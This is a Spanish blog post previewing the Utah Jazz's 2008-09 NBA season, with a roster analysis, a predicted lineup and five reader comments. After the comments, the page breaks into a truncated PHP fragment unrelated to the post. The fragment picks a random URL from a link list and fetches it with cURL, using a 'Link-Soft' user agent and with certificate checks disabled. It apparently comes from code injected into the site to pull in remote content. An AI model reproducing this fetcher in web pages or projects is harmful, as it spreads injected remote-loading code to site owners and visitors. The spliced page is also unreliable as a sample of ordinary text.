Utah Jazz: Tan cerca, tan lejos

02 de October de 2008 por TheDeerHunter

jerry sloan gritaNo cabe duda de que Sloan y sus Jazz se han ganado con creces la consideración y el respeto de todos tras su buen hacer de las últimas campañas. Tenemos de ellos la imagen de equipo serio y conjuntado, equilibrado, sostenido por unos pilares sólidos tanto en el banco como en la cancha, rocoso e incómodo pero de una calidad exquisita. Y, para colmo, juegan como locales en el temido infierno de Salt Lake.

No nos sorprenderá a ninguno encontrarlos como candidatos en cualquier pronóstico que se publique en los medios. Es más, tampoco debería sorprender incluso que llegaran a ser campeones. Pueden ganar a cualquiera. Lo han demostrado.

Sin embargo, de la misma forma que su altísimo nivel de juego de los últimos tiempos han generado la buena imagen que tenemos de ellos, los resultados finales nos han dejado un poso de inconclusión en relación al objetivo que persiguen, que ya no puede ser otro que el Anillo. En otras palabras: todo el mundo los da como favoritos con la boca pequeña porque muy pocos piensan que, en la práctica, están en condiciones de serlo. Queda la sensación de que les falta algo, no mucho, algún pequeño detalle por pulir, ciertos retoques puntuales, que Boozer no baje el nivel en Playoffs, que Kirilenko recupere el nivel All-Star, que Korver adquiera galones de titular, tanto en ataque como en defensa (¡yihaaa!!!), un paso adelante de alguno de sus jovenes valores, algún golpe extra de buena suerte…

El caso es que, como no puede ser de otra manera, el sabor de boca que quedó tras la derrota en segunda ronda de la complicadísima última temporada no fue bueno, y los fichajes de este verano no han logrado reforzar sustancialmente la plantilla. Tampoco se puede decir que se haya hecho un mal trabajo. Se ha seguido la línea de coherencia y de moderación tradicional de la franquicia. Han retenido a CJ Miles, un jugador de corte medio que evidentemente consideran útil para el proyecto; han fichado a Brevin Knight, que seguro que dará sensatos minutos de refresco en la dirección, y se ha traido a Kosta Koufos, Tomic y Dragicevic, interesantes diamantes en bruto europeos que de seguro Sloan sabrá cómo pulir.

boozer deron charlandoPor momentos salieron rumores de movimientos más ambiciosos buscando supuestas incorporaciones de renombre que hubieran significado un salto de calidad definitivo, pero la realidad salarial hace inviable, incluso, el mantenimiento del proyecto siquiera a medio plazo.

Esto es lo que hay. Nada más. El equipo se debate entre el “jóvenes, pero sobradamente preparados y con margen de mejora” y el “ahora o nunca”, al menos para este proyecto. No es mal panorama aunque parezca lo contrario. Lo peor que se puede decir de los Jazz son argumentos de lo más relativos y subjetivos a toro pasado en la línea de opinión que se aplicaba hasta hace no mucho a casos como el Garnett, Pierce o Ray Allen y a equipos y jugadores que sencillamente no lograron ganar por el canto de un duro.

Es indiscutible la evaluación de lo que han llegado a hacer hasta la fecha pero eso, en el caso de este equipo, para nada es indicativo de adónde pueden llegar. Lo tienen todo: Un juego interior competitivo, que combina potencia y versatilidad. Boozer será agente libre el próximo verano, así que ésta será su temporada. El ahora o nunca cobra un significado especialmente particular en su caso. No se esperan un empeoramiento en las prestaciones de Okur, ni de Millsap y, aunque el rendimiento de Kirilenko últimamente supone una incógnita, seguro que dará el do de pecho si se dan las circunstancias oportunas.

Vacile KirilenkoDeron Williams es un aunténtico purasangre y un seguro de vida. Si por una de ésas su progresión siguiera siendo tan increíble como hasta ahora, nadie podría parar a este equipo. En cualquier caso ahora mismo ya es un jugador perfectamente capacitado para liderar a un equipo campeón, sin necesidad de llegar a ser un monstruo. En el resto de intendencia tienen jugadores solventes y variados. Korver tiene que demostrar este año si es un verdadero francotirador o se queda en pistolillas y muchos equipos fueron campeones con algún que otro jugador inferior a Ronny Brewer, Harpring, Brevin Knight… Veremos qué es lo que dan de sí los rookies europeos.

Seguro que habrán otros con mejores plantillas o con mayores estrellas, ya es más difícil que los haya con un nivel colectivo como el que tienen los Jazz, y ésa es su principal baza.

Este equipo, en condiciones normales, tendría nivel para garantizar como mínimo la final de conferencia año tras año. La única duda es que ahora mismo la Conferencia Oeste es un auténtico estado de excepción.

Al final, todo se resume en si serán capaces o no de ser campeones.

Quinteto inicial: Deron Williams, Kyle Korver, Andrei Kirilenko, Carlos Boozer y Mehmet Okur
6º hombre: Ronnie Brewer

Pronóstico: Semifinales de Conferencia.

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    No creo que haya cambios importantes en la aportación de Deron, que es un crack, ni en la de Boozer y Okur. Kirilenko sí ha de mejorar, y luego están los aleros, que han de aportar más. Por ahí sí tienen margen de mejora, con CJ y Brewer, y no tanto con Korver.

    Buen equipo, magnífico base y grandísimo entrenador… pero la competencia en el Oeste es terrible y creo que no les llega para finalistas. Los veo como tú, en semis.

      Citar

  2. Txusma dice:
    #2

    De acuerdo con los 2. El equipo es tremendo pero en el Oeste no parece que pueda a ser suficiente. No se yo si Kirilenko mejorará mas q nada por q su papel en el equipo no variara y se ha demostrado que no le sienta bien eso de tercer o cuarto espada. Por ese lado no hay mas cera que la que arde, al contrario de Brewer y Cj que tienen margen

      Citar

  3. TheDeerHunter dice:
    #3

    Pues… evidentemente, si me tuviera que jugar los cuartos no apostaría por ellos.
    Pero intuyo que yo sí les doy más “chances” que vosotros.
    No sé si Boozer mejorará, pero margen tiene porque hasta ahora en los momentos clave siempre lo ha hecho bastante como el culo (con sólo que controlara un pelín sus problemas de faltas ya lo tenía)
    No sé si lo hará Kirilenko… pero es curioso el caso. Siempre que yo le he visto ha jugado como el ojete SIEMPRE… excepto un puñetero partido (y supongo que muchos adivinaréis cual fue) Llegado un momento importante estará ahí… el problema es que no creo que sea él quien lleve al equipo a ese momento importante.
    CJ Miles, Brewer… vosotros creéis que Korver no, yo creo que es un especialista interesantísimo bien arropado alrededor (que Utah puede darle esto)

    El caso es que, con todo, el año pasado cuando los Lakers ganaron “sobrados” 4-2 y tal… y muchos dijeron que en ningún momento vieron peligrar la eliminatoria, yo recordaba el primer partido… en el que tuvieron la victoria en su mano y se hicieron cacas en el peor momento, recordaba la cera que nos dieron en Salt-Lake, Kobe medio lesionado para el 5º partido, la defensa de guante blanco de Kirilenko…
    A pesar de que nadie vió la serie peligrar, a pocos le hubiera podido sorprender que Lakers palmaran en aquella eliminatoria visto el 4º partido (por poner un ejemplo) y con Ginobili lesionado ¿no hubieran sido capaces de tumbar a Spurs??
    Por último, también pienso en el motivo en el que Lakers perdió la final y creo que por ahí no hubiera perdido Utah… quizás por otro lado. Nunca lo sabremos no obstante.

      Citar

  4. Jabho dice:
    #4

    Pues si, coincido en que es un equipazo pero les falta un pasito. Quizás la opción pase por traspasar a AK que además es público que no está todo lo a a gusto que debería.

    Creo que este año no pasan de primera de ronda

      Citar

  5. Albert dice:
    #5

    En mi opinión el único problema de los Jazz es que la pareja interior es de lo peor defensivamente hablando… si Boozer se convirtiera en un defensor NORMAL, los Jazz serían candidatos a todo sin peros.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>